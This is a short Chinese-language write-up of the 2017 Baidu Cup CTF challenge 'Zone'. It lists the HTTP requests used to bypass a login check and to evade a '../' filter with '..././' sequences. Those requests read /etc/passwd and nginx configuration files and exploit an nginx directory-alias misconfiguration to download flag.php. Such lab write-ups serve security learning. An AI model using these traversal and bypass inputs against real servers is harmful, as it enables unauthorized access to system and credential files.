“百度杯”CTF比赛 2017 二月场--Zone

提示未登录

BP抓包修改login=1，成功登录

点击manage抓包，修改login=1，返回包中发现有个302页面跳转

尝试访问系统配置文件

GET /manages/admin.php?module=/etc/passwd&name=  无回显

GET /manages/admin.php?module=../../../etc/passwd&name=  无回显

怀疑过滤了../  尝试用..././

GET /manages/admin.php?module=..././..././..././etc/passwd&name=

成功回显

中间尝试时，返回404中显示是nginx

打开自己的kali，终端输入：find / -name "nginx.conf"

查找配位文件的位置为/etc/nginx/nginx.conf

 

GET /manages/admin.php?module=..././..././..././etc/nginx/nginx.conf&name=

返回包中发现

GET /manages/admin.php?module=..././..././..././etc/nginx/sites-enabled/default&name=

返回包中发现

autoindex on  意为打开了目录浏览

访问/online-movies ,发现页面上显示../即可浏览目录下载文件。

扫描网站后台路径得到robots.txt，访问得到存在flag.php

访问路径：/online-movies../var/www/html/flag.php

下载flag.php得到flag值